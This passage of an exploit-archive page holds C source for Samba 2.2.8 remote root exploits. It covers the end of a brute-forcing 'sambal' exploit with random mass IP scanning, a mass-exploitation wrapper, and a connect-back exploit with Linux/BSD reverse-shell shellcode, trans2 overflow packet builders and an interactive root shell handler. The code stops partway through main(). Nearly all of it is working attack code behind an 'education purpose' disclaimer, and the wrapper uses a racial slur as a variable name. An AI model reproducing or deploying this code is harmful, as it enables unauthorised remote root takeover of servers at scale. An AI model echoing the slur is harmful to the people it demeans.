                                        fprintf(stderr, "Invalid number of childs.\n");
                                        return -1;
                                }

                                if (MAX_CHILDS > 99) {
                                        fprintf(stderr, "Too many childs, using 99. \n");
                                        MAX_CHILDS = 99;
                                }

                                break;
                        case 'd':
                                BRUTE_DELAY = atoi(optarg);
                                break;
                        case 'f':
                                force = 1;
                                break;
                        case 'p':
                                port = atoi(optarg);
                                if ((port <= 0) || (port > 65535)) {
                                        fprintf(stderr, "Invalid port.\n\n");
                                        return -1;
                                }
                                break;
                        case 'r':
                                ret = strtoul(optarg, &optarg, 16);
                                break;
                        case 's':
                                random  = 1;
                                scan    = 1;
                                break;
                        case 'S':
                                random  = 0;
                                scan    = 1;
                                sscanf(optarg, "%d.%d.%d", &ip1, &ip2, &ip3);
                                ip3--;
                                break;
                        case 't':
                                type = atoi(optarg);
                                if (type == 0 || type > sizeof(targets) / 16) {
                                        for(i = 0; i < sizeof(targets) / 16; i++)
                                                fprintf(stdout, "%02d. %s           [0x%08x]\n", i + 1,
                                                                targets[i].type, (unsigned int) targets[i].ret);
                                        fprintf(stderr, "\n");
                                        return -1;
                                }
                                break;
                        case 'v':
                                verbose = 1;
                                break;
                        default:
                                usage(argv[0] == NULL ? "sambal" : argv[0]);
                                break;
                }

        }

        if ((argv[optind] == NULL && scan == 0) || (type == 0 && brute == -1 && scan == 0))
                usage(argv[0] == NULL ? "sambal" : argv[0]);

        if (scan == 1) 
                fprintf(stdout, "+ Scan mode.\n");
        if (verbose == 1)
                fprintf(stdout, "+ Verbose mode.\n");

        if (scan == 1) {

                srand(getpid());

                while (1) {

                        if (random == 1) {
                                ip1 = rand() % 255;
                                ip2 = rand() % 255;
                                ip3 = rand() % 255; } 
                        else {
                                ip3++;
                                if (ip3 > 254) { ip3 = 1; ip2++; }
                                if (ip2 > 254) { ip2 = 1; ip1++; }
                                if (ip1 > 254) exit(0);
                        }

                        for (ip4 = 0; ip4 < 255; ip4++) {
                                i++;
                                snprintf(scan_ip, sizeof(scan_ip) - 1, "%u.%u.%u.%u", ip1, ip2, ip3, ip4);
                                usleep(BRUTE_DELAY);

                                switch (fork()) {
                                        case 0:
                                                switch(is_samba(scan_ip, 2)) {
                                                        case 0:
                                                                fprintf(stdout, "+ [%s] Samba\n", scan_ip);
                                                                break;
                                                        case 1:
                                                                fprintf(stdout, "+ [%s] Windows\n", scan_ip);
                                                                break;
                                                        default:
                                                                break;  
                                                }

                                                exit(0);
                                                break;
                                        case -1:
                                                fprintf(stderr, "+ fork() error\n");
                                                exit(-1);
                                                break;
                                        default:
                                                if (i > MAX_CHILDS - 2) { 
                                                        wait(&status); 
                                                        i--;
                                                }
                                                break;
                                }
                        }

                }

                return 0;
        }


        he = gethostbyname(argv[optind]);

        if (he == NULL) {
                fprintf(stderr, "Unable to resolve %s...\n", argv[optind]);
                return -1;
        }

        if (brute == -1) {

                if (ret == 0) ret = targets[type - 1].ret;

                shellcode = targets[type - 1].shellcode;

                if (connectback == 1) {
                        fprintf(stdout, "+ connecting back to: [%d.%d.%d.%d:45295]\n",
                                        ip1, ip2, ip3, ip4);

                        switch(targets[type - 1].os_type) {
                                case 0: /* linux */
                                        shellcode = linux_connect_back;
                                        break;
                                case 1: /* FreeBSD/NetBSD */
                                        shellcode = bsd_connect_back;
                                        break;
                                case 2: /* OpenBSD */
                                        shellcode = bsd_connect_back;
                                        break;
                                case 3: /* OpenBSD 3.2 Non-exec stack */
                                        shellcode = bsd_connect_back;
                                        break;
                        }

                }

                if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
                        fprintf(stderr, "+ socket() error.\n");
                        return -1;
                }

                if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
                        fprintf(stderr, "+ socket() error.\n");
                        return -1;
                }

                memcpy(&addr1.sin_addr, he->h_addr, he->h_length);
                memcpy(&addr2.sin_addr, he->h_addr, he->h_length);

                addr1.sin_family = AF_INET;
                addr1.sin_port   = htons(port); 
                addr2.sin_family = AF_INET;
                addr2.sin_port   = htons(45295);

                if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == -1) {
                        fprintf(stderr, "+ connect() error.\n");
                        return -1;
                }

                if (verbose == 1) fprintf(stdout, "+ %s\n", targets[type - 1].type);

                if (force == 0) {

                        if (is_samba(argv[optind], 2) != 0) {
                                fprintf(stderr, "+ Host is not running samba!\n\n");
                                return -1;
                        }

                        fprintf(stderr, "+ Host is running samba.\n");
                }

                if (verbose == 1) fprintf(stdout, "+ Connected to [%s:%d]\n", (char *)inet_ntoa(addr1.sin_addr), port);

                if (start_session(sock) < 0) fprintf(stderr, "+ Session failed.\n");

                if (verbose == 1) fprintf(stdout, "+ Session established\n");
                sleep(5);
                if (targets[type - 1].os_type != 2) {
                        if (exploit_normal(sock, ret, shellcode) < 0) {
                                fprintf(stderr, "+ Failed.\n");
                                close(sock);
                        }
                } else {
                        if (exploit_openbsd32(sock, ret, shellcode) < 0) {
                                fprintf(stderr, "+ Failed.\n");
                                close(sock);
                        }
                }

                sleep(2);

                if (connectback == 0) {
                        if(connect(sock2, (struct sockaddr *)&addr2, sizeof(addr2)) == -1) {
                                fprintf(stderr, "+ Exploit failed, try -b to bruteforce.\n");

                                return -1;
                        }

                        fprintf(stdout, "--------------------------------------------------------------\n");

                        shell(sock2);
                        close(sock);
                        close(sock2);
                } else {
                        fprintf(stdout, "+ Done...\n");
                        close(sock2);
                        close(sock);
                }
                return 0;
        }

        signal(SIGPIPE, SIG_IGN);
        signal(SIGUSR1, handler);

        switch(brute) {
                case 0:
                        if (ret == 0) ret = 0xc0000000;
                        shellcode = linux_bindcode;
                        fprintf(stdout, "+ Bruteforce mode. (Linux)\n");
                        break;
                case 1:
                        if (ret == 0) ret = 0xbfc00000;
                        shellcode = bsd_bindcode;
                        fprintf(stdout, "+ Bruteforce mode. (FreeBSD / NetBSD)\n");
                        break;
                case 2:
                        if (ret == 0) ret = 0xdfc00000;
                        shellcode = bsd_bindcode;
                        fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.1 and prior)\n");
                        break;
                case 3:
                        if (ret == 0) ret = 0x00170000;
                        shellcode = bsd_bindcode;
                        fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.2 - non-exec stack)\n");
                        break;
                }

        memcpy(&addr1.sin_addr, he->h_addr, he->h_length);
        memcpy(&addr2.sin_addr, he->h_addr, he->h_length);

        addr1.sin_family = AF_INET;
        addr1.sin_port   = htons(port);
        addr2.sin_family = AF_INET;
        addr2.sin_port   = htons(45295);

        for (i = 0; i < 100; i++)
                childs[i] = -1;
        i = 0;

        if (force == 0) {
                if (is_samba(argv[optind], 2) != 0) {
                        fprintf(stderr, "+ Host is not running samba!\n\n");
                        return -1;
                }

                fprintf(stderr, "+ Host is running samba.\n");
        }

        while (OWNED == 0) {

                if (sock  > 2) close(sock);
                if (sock2 > 2) close(sock2);

                if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
                        if (verbose == 1) fprintf(stderr, "+ socket() error.\n");
                }
                else {  
                        ret -= STEPS;
                        i++;
                }

                if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0)
                        if (verbose == 1) fprintf(stderr, "+ socket() error.\n");


                if ((ret & 0xff) == 0x00 && brute != 3) ret++;

                if (verbose == 1) fprintf(stdout, "+ Using ret: [0x%08x]\n", (unsigned int)ret);

                usleep(BRUTE_DELAY);

                switch (childs[i] = fork()) {
                        case 0:
                                if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), port, 2) == -1) {
                                        if (sock  > 2) close(sock);
                                        if (sock2 > 2) close(sock2);
                                        exit(-1);
                                }

                                if(write_timer(sock, 3) == 1) {
                                        if (start_session(sock) < 0) {
                                                if (verbose == 1) fprintf(stderr, "+ Session failed.\n");
                                                if (sock  > 2)close(sock);
                                                if (sock2 > 2) close(sock2);
                                                exit(-1);
                                        }

                                        if (brute == 3) {
                                                if (exploit_openbsd32(sock, ret, shellcode) < 0) {
                                                        if (verbose == 1) fprintf(stderr, "+ Failed.\n");
                                                        if (sock  > 2) close(sock);
                                                        if (sock2 > 2) close(sock2);
                                                        exit(-1);
                                                }
                                        } 
                                else {
                                        if (exploit_normal(sock, ret, shellcode) < 0) {
                                                if (verbose == 1) fprintf(stderr, "+ Failed.\n");
                                                if (sock  > 2) close(sock);
                                                if (sock2 > 2) close(sock2);
                                                exit(-1);
                                        }

                                        if (sock > 2) close(sock);

                                        if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
                                                if (sock2 > 2) close(sock2);
                                                exit(-1);
                                        }

                                        if(Connect(sock2, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) {
                                                if (sock2  > 2) close(sock2);
                                                kill(getppid(), SIGUSR1);
                                        }

                                        exit(1);
                                }


                                exit(0);
                                break;
                        case -1:
                                fprintf(stderr, "+ fork() error\n");
                                exit(-1);
                                break;
                        default:
                                if (i > MAX_CHILDS - 2) {
                                        wait(&status);
                                        i--;
                                }
                                break;
                        }

                }

        }

        return 0;
}

// milw0rm.com [2003-04-10]
		

- Vulnerability information (55)

Samba 2.2.8 (Bruteforce Method) Remote Root Exploit (EDBID:55)
linux remote
2003-07-13 Verified
139 Schizoprenic
N/A [download]
/* 
 * Mass Samba Exploit by Schizoprenic
 * Xnuxer-Research (c) 2003
 * This code just for education purpose 
 */

#include <stdio.h> 
#include <stdlib.h> 
#include <sys/stat.h> 

void usage(char *s)
{
  printf("Usage: %s  \n",s);
  exit(-1);
}

int main(int argc, char **argv)
{
  printf("Mass Samba Exploit by Schizoprenic\n");
  if(argc != 3) usage(argv[0]);
  scan(argv[1], argv[2]);
  return 0;
}

int scan(char *fl, char *bind_ip)
{
  FILE *nigger,*fstat;
  char buf[512];
  char cmd[100];
  int i;
  struct stat st;
   
  if((nigger=fopen(fl,"r")) == NULL) {
    fprintf(stderr,"File %s not found!\n", fl);
    return -1;
  }

  while(fgets(buf,512,nigger) != NULL)
  {
    if(buf[strlen(buf)-1]=='\n') buf[strlen(buf)-1]=0;
    for (i=0;i<4;i++) {
       sprintf(cmd, "./smb %d %s %s", i, buf, bind_ip);
       printf("\nTrying get root %s use type %d ...\n",buf,i);
       system(cmd);
       if (stat(".ROOT", &st) != -1) {
          unlink(".ROOT");
          break; 
       }
    }    
  }
  fclose(nigger);
  printf("\nMass exploiting finished.\n");
}


/*
 *  Samba Remote Root Exploit by Schizoprenic from Xnuxer-Labs, 2003.
 *  Using connect back method and brute force mode.
 *  I just create & modify some code and ripped too :P 
 *  Create on May, 12st 2003
 *
 *  Thanks to eDSee (netric.org), Sambal is nice exploit bro...
 *  References: trans2root.pl, 0x333hate.c, sambal.c
 *  This code just for education purpose 
 *
 *  XNUXER RESEARCH LABORATORY
 *  Official Site: http://infosekuriti.com
 *  Contact Email: xnuxer@yahoo.com, xnuxer@hackermail.com
 */

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

char
linux_connect_back[] =
    /* fork(), execve sh -c [client] [host to bounce to], term=xterm */
    "\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50"
    "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
    "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
    "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
    "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68"
    "\x2d\x63\x89\xe3\x50\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50"
    "\x89\xe1\x31\xc0\x50\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68"
    "\x54\x45\x52\x4d\x89\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73"
    "\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80\x31\xc0\xb0"
    "\x01\xcd\x80"

    /* connect back shellcode (port=0xb0ef) */
    "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
    "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51"
    "\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3"
    "\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
    "\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
    "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
    "\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f"
    "\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
    "\x01\xcd\x80";

char
bsd_connect_back[] =
    /* fork(), execve sh -c [client] [host to bounce to], term=xterm */
    "\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50"
    "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
    "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
    "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
    "\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68\x2d\x63\x89\xe3\x50"
    "\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50\x89\xe1\x31\xc0\x50"
    "\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68\x54\x45\x52\x4d\x89"
    "\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
    "\x69\x89\xe3\x50\x52\x51\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0"
    "\x01\xcd\x80"

    /* connect back shellcode (port=0xb0ef) */
    "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"
    "\x61\xcd\x80\x31\xd2\x52\x52\x68\x41\x41\x41\x41\x66\x68\xb0\xef"
    "\xb7\x02\x66\x53\x89\xe1\xb2\x10\x52\x51\x50\x52\x89\xc2\x31\xc0"
    "\xb0\x62\xcd\x80\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80"
    "\x31\xc0\x50\x52\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x52"
    "\x50\xb0\x5a\xcd\x80\x31\xc0\x43\x53\x52\x50\xb0\x5a\xcd\x80\x31"
    "\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54"
    "\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

typedef struct {
	unsigned char type;
	unsigned char flags;
	unsigned short length;
} NETBIOS_HEADER;

typedef struct {
	unsigned char protocol[4];
	unsigned char command;
	unsigned short status;
	unsigned char reserved;
	unsigned char  flags;
	unsigned short flags2;
	unsigned char  pad[12];
	unsigned short tid;
	unsigned short pid;
	unsigned short uid;
	unsigned short mid;
} SMB_HEADER;

pid_t childs[50];
int LOOP = 1;
struct sockaddr_in serv_addr;
int sock_listen, client;
int exploit_pid;
int listen_pid;
int port_listen = 45295;

void 
usage(char *prog) 
{
int i;

   fprintf(stdout, "Samba < 2.2.8 Remote Root exploit by Schizoprenic\n"
                   "Connect back method, Xnuxer-Labs, 2003.\n"
                   "Usage  : %s   \n"
                   "Targets:\n"
                   "         0 = Linux\n"
                   "         1 = FreeBSD/NetBSD\n"
                   "         2 = OpenBSD 3.0 and prior\n"
                   "         3 = OpenBSD 3.2 - non-exec stack\n\n", prog);      
   exit(1);
}

int 
Connect(int fd, char *ip, unsigned int port, unsigned int time_out) 
{
	/* ripped from no1 */

	int                      flags;
	int                      select_status;
	fd_set                   connect_read, connect_write;
	struct timeval           timeout;
	int                      getsockopt_length = 0;
	int                      getsockopt_error = 0;
	struct sockaddr_in       server;
	bzero(&server, sizeof(server));
	server.sin_family = AF_INET;
	inet_pton(AF_INET, ip, &server.sin_addr);
	server.sin_port = htons(port);

	if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
		close(fd);
    		return -1;
  	}
  
	if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
		close(fd);
    		return -1;
  	}
  	
	timeout.tv_sec = time_out;
	timeout.tv_usec = 0;
	FD_ZERO(&connect_read);
	FD_ZERO(&connect_write);
	FD_SET(fd, &connect_read);
	FD_SET(fd, &connect_write);

	if((connect(fd, (struct sockaddr *) &server, sizeof(server))) < 0) {
		if(errno != EINPROGRESS) {
      			close(fd);
      			return -1;
    		}
  	}
	else {
		if(fcntl(fd, F_SETFL, flags) < 0) {
			close(fd);
      			return -1;
    		}
    		
		return 1;

	}

	select_status = select(fd + 1, &connect_read, &connect_write, NULL, &timeout);

	if(select_status == 0) {
		close(fd);
		return -1;

	}

	if(select_status == -1) {
		close(fd);
		return -1;
	}

	if(FD_ISSET(fd, &connect_read) || FD_ISSET(fd, &connect_write)) {
		if(FD_ISSET(fd, &connect_read) && FD_ISSET(fd, &connect_write)) {
			getsockopt_length = sizeof(getsockopt_error);

			if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_error, &getsockopt_length) < 0) {
				errno = ETIMEDOUT;
				close(fd);
				return -1;
			}

			if(getsockopt_error == 0) {
				if(fcntl(fd, F_SETFL, flags) < 0) {
					close(fd);
					return -1;
				}
				return 1;
		        } 

			else {
				errno = getsockopt_error;
				close(fd);
				return (-1);
				}

			}
		}
	else {
		close(fd);
		return 1;
	}

	if(fcntl(fd, F_SETFL, flags) < 0) {
		close(fd);
		return -1;
	}
	return 1;
}

int 
read_timer(int fd, unsigned int time_out)
{

	/* ripped from no1 */

	int                      flags;
	int                      select_status;
	fd_set                   fdread;
	struct timeval           timeout;

	if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
		close(fd);
		return (-1);
	}

	if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
		close(fd);
		return (-1);
	}

	timeout.tv_sec = time_out;
	timeout.tv_usec = 0;
	FD_ZERO(&fdread);
	FD_SET(fd, &fdread);
	select_status = select(fd + 1, &fdread, NULL, NULL, &timeout);

	if(select_status == 0) {
		close(fd);
		return (-1);
	}

	if(select_status == -1) {
		close(fd);
		return (-1);
	}
  
	if(FD_ISSET(fd, &fdread)) {
  
  		if(fcntl(fd, F_SETFL, flags) < 0) {
			close(fd);
      			return -1;
    		}
    		
		return 1;
	
	} 
	else {
		close(fd);
		return 1;

	}
}

int
write_timer(int fd, unsigned int time_out)
{

	/* ripped from no1 */

	int                      flags;
	int                      select_status;
	fd_set                   fdwrite;
	struct timeval           timeout;

	if((flags = fcntl(fd, F_GETFL, 0)) < 0) {    
		close(fd);
		return (-1);
	}
	
	if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
		close(fd);
		return (-1);
  	}
  	
	timeout.tv_sec = time_out;
	timeout.tv_usec = 0;
	FD_ZERO(&fdwrite);
	FD_SET(fd, &fdwrite);

	select_status = select(fd + 1, NULL, &fdwrite, NULL, &timeout);

	if(select_status == 0) {
		close(fd);
		return -1;
	}
	
	if(select_status == -1) {
		close(fd);
		return -1;
	}

	if(FD_ISSET(fd, &fdwrite)) {
		if(fcntl(fd, F_SETFL, flags) < 0) {
			close(fd);
			return -1;
		}
		return 1;
	}
	else { 
		close(fd);
		return -1;
	}
}

int 
start_session(int sock)
{
	char buffer[1000];
	char response[4096];
	char session_data1[] 	= "\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01\x00\x00\x00\x00";
        char session_data2[] 	= "\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24\x25\x6e\x6f\x62\x6f\x64\x79"
		                  "\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24";
	
        NETBIOS_HEADER  *netbiosheader;
        SMB_HEADER      *smbheader;

	memset(buffer, 0x00, sizeof(buffer));

        netbiosheader   = (NETBIOS_HEADER *)buffer;
        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        netbiosheader->type 	= 0x00;         /* session message */
        netbiosheader->flags 	= 0x00;
        netbiosheader->length 	= htons(0x2E);

        smbheader->protocol[0] 	= 0xFF;
        smbheader->protocol[1] 	= 'S';
        smbheader->protocol[2] 	= 'M';
        smbheader->protocol[3] 	= 'B';
        smbheader->command 	= 0x73;         /* session setup */
        smbheader->flags 	= 0x08;         /* caseless pathnames */
        smbheader->flags2 	= 0x01;         /* long filenames supported */
        smbheader->pid 		= getpid() & 0xFFFF;
	smbheader->uid          = 100;
        smbheader->mid 		= 0x01;

        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data1, sizeof(session_data1) - 1);

	if(write_timer(sock, 3) == 1)
		if (send(sock, buffer, 50, 0) < 0) return -1;

	memset(response, 0x00, sizeof(response));

	if (read_timer(sock, 3) == 1)
		if (read(sock, response, sizeof(response) - 1) < 0) return -1;
	
        netbiosheader = (NETBIOS_HEADER *)response;
        smbheader     = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));

	//if (netbiosheader->type != 0x00) fprintf(stderr, "+ Recieved a non session message\n");

        netbiosheader   = (NETBIOS_HEADER *)buffer;
        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        memset(buffer, 0x00, sizeof(buffer));

        netbiosheader->type     = 0x00;         /* session message */
        netbiosheader->flags    = 0x00;
        netbiosheader->length   = htons(0x3C);

        smbheader->protocol[0]  = 0xFF;
        smbheader->protocol[1]  = 'S';
        smbheader->protocol[2]  = 'M';
        smbheader->protocol[3]  = 'B';
        smbheader->command      = 0x70;         /* start connection */
	smbheader->pid          = getpid() & 0xFFFF;
	smbheader->tid		= 0x00;
        smbheader->uid          = 100;

	memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data2, sizeof(session_data2) - 1);

        if(write_timer(sock, 3) == 1)
                if (send(sock, buffer, 64, 0) < 0) return -1;

        memset(response, 0x00, sizeof(response));

        if (read_timer(sock, 3) == 1)
                if (read(sock, response, sizeof(response) - 1) < 0) return -1;

        netbiosheader = (NETBIOS_HEADER *)response;
        smbheader     = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));

        if (netbiosheader->type != 0x00) return -1;

        return 0;
}

int
exploit_normal(int sock, unsigned long ret, char *shellcode)
{

	char buffer[4000];
        char exploit_data[] =
                "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"

		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x90";

	int i = 0;
	unsigned long dummy = ret - 0x90;

        NETBIOS_HEADER  *netbiosheader;
        SMB_HEADER      *smbheader;

	memset(buffer, 0x00, sizeof(buffer));

        netbiosheader   = (NETBIOS_HEADER *)buffer;
        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        netbiosheader->type             = 0x00;         /* session message */
        netbiosheader->flags            = 0x04;
        netbiosheader->length           = htons(2096);

        smbheader->protocol[0]          = 0xFF;
        smbheader->protocol[1]          = 'S';
        smbheader->protocol[2]          = 'M';
        smbheader->protocol[3]          = 'B';
        smbheader->command              = 0x32;         /* SMBtrans2 */
	smbheader->tid			= 0x01;
        smbheader->uid                  = 100;

	memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);

	buffer[1096] = 0xEB;
	buffer[1097] = 0x70;

	for (i = 0; i < 4 * 24; i += 8) {
		memcpy(buffer + 1099 + i, &dummy, 4);
		memcpy(buffer + 1103 + i, &ret,   4);
	}

        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), 
			exploit_data, sizeof(exploit_data) - 1);
	memcpy(buffer + 1800, shellcode, strlen(shellcode));

	if(write_timer(sock, 3) == 1) {
		if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;
		return 0;
	}

	return -1;
}

int
exploit_openbsd32(int sock, unsigned long ret, char *shellcode)
{
        char buffer[4000];

        char exploit_data[] =
                "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x90";

        int i = 0;
        unsigned long dummy = ret - 0x30;
        NETBIOS_HEADER  *netbiosheader;
        SMB_HEADER      *smbheader;

        memset(buffer, 0x00, sizeof(buffer));

        netbiosheader   = (NETBIOS_HEADER *)buffer;
        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        netbiosheader->type             = 0x00;         /* session message */
        netbiosheader->flags            = 0x04;
        netbiosheader->length           = htons(2096);

        smbheader->protocol[0]          = 0xFF;
        smbheader->protocol[1]          = 'S';
        smbheader->protocol[2]          = 'M';
        smbheader->protocol[3]          = 'B';
        smbheader->command              = 0x32;         /* SMBtrans2 */
        smbheader->tid                  = 0x01;
        smbheader->uid                  = 100;

        memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);

	for (i = 0; i < 4 * 24; i += 4)
		memcpy(buffer + 1131 + i, &dummy, 4);
		
        memcpy(buffer + 1127, &ret,      4);

        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER),
                        exploit_data, sizeof(exploit_data) - 1);

        memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode));

        if(write_timer(sock, 3) == 1) {
                if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;
                return 0;
        }

        return -1;
}


void shell(int sock)
{
 fd_set  fd_read;
 char buff[1024], *cmd="uname -a;id;\n";
 int n;

 send(sock, cmd, strlen(cmd), 0);

 while(1) {
  FD_SET(sock,&fd_read);
  FD_SET(0,&fd_read);

  if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;

  if( FD_ISSET(sock, &fd_read) ) {
   n=read(sock,buff,sizeof(buff));
   if (n == 0) {
       printf ("Connection closed.\n");
       exit(EXIT_FAILURE);
   } else if (n < 0) {
       perror("read remote");
       exit(EXIT_FAILURE);
   }
   write(1,buff,n);
  }

  if ( FD_ISSET(0, &fd_read) ) {
    if((n=read(0,buff,sizeof(buff)))<=0){
      perror ("read user");
      exit(EXIT_FAILURE);
    }
    write(sock,buff,n);
  }
 }
 close(sock); 
}

void GoAway() 
{
   exit(0);
}

void start_listen()
{
FILE *fstat;
int cpid;
   
LISTENER:

  bzero(&serv_addr, sizeof(serv_addr));
  serv_addr.sin_family=2;
  serv_addr.sin_addr.s_addr=0;
  serv_addr.sin_port=htons(port_listen); 
  sock_listen=socket(2,1,6);

  if(bind(sock_listen,(struct sockaddr *)&serv_addr,16)) 
  {   
      port_listen++;
      goto LISTENER;       
  }
   
  if(listen(sock_listen,1)) 
  {
      perror("listen");
      exit(1);
  }
   
  fprintf(stdout, "[+] Listen on port: %d\n",port_listen);
   
  cpid = fork();
 
  if (cpid) {
     client=accept(sock_listen,0,0);
     LOOP = 0;
     kill(SIGUSR2, exploit_pid);
     if (client > 0) {
        fprintf(stdout, "[+] Yeah, I have a root ....!\n"
                      "------------------------------\n");
        fstat=fopen(".ROOT", "a");  //needed by mass.c
        fclose(fstat);
        shell(client);
     }
     exit(0);
  }
}

int
main (int argc,char *argv[])
{
   char *shellcode = NULL;
   int typeos	= -1;
   int port		= 139;
   int sock		= 0;
   int i		= 0;
   int status	= 0;
   int m		= 0;
   int ip1		= 0;
   int ip2		= 0;
   int ip3		= 0;
   int ip4		= 0;
   int sta		= 0;
   int STEPS	= 512;
   int ENDLOOP    = 64;
   char *desc; 
   unsigned long MAX_CHILDS  = 40;
   unsigned long ret         = 0x0;
   unsigned short int  a_port;
   struct sockaddr_in addr1;
   struct hostent *he;
   struct stat st;
   
      if (argc != 4) usage(argv[0]);
   
      typeos = atoi(argv[1]);
      if (typeos > 3) {
          fprintf(stdout, "Os type out of list!\n");
          exit(1);
      }

      he = gethostbyname(argv[2]);

      if (he == NULL) {
          fprintf(stderr, "Unable to resolve\n");
          return -1;
      }

      listen_pid = getpid();
      start_listen();
      exploit_pid = listen_pid + 1;

      //fprintf(stdout, "[+] Listen pid: %d, exploit pid: %d\n", listen_pid,exploit_pid);

      sscanf(argv[3], "%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4);		
      linux_connect_back[171] = ip1; bsd_connect_back[162] = ip1;
      linux_connect_back[172] = ip2; bsd_connect_back[163] = ip2;
      linux_connect_back[173] = ip3; bsd_connect_back[164] = ip3;
      linux_connect_back[174] = ip4; bsd_connect_back[165] = ip4;
				
      fprintf(stdout, "[+] Connecting back to: [%d.%d.%d.%d:%d]\n", 
					ip1, ip2, ip3, ip4, port_listen);

      a_port = htons(port_listen);
      
      linux_connect_back[177]= (a_port) & 0xff;
      linux_connect_back[178]= (a_port >> 8) & 0xff;
      bsd_connect_back[168]= (a_port) & 0xff;
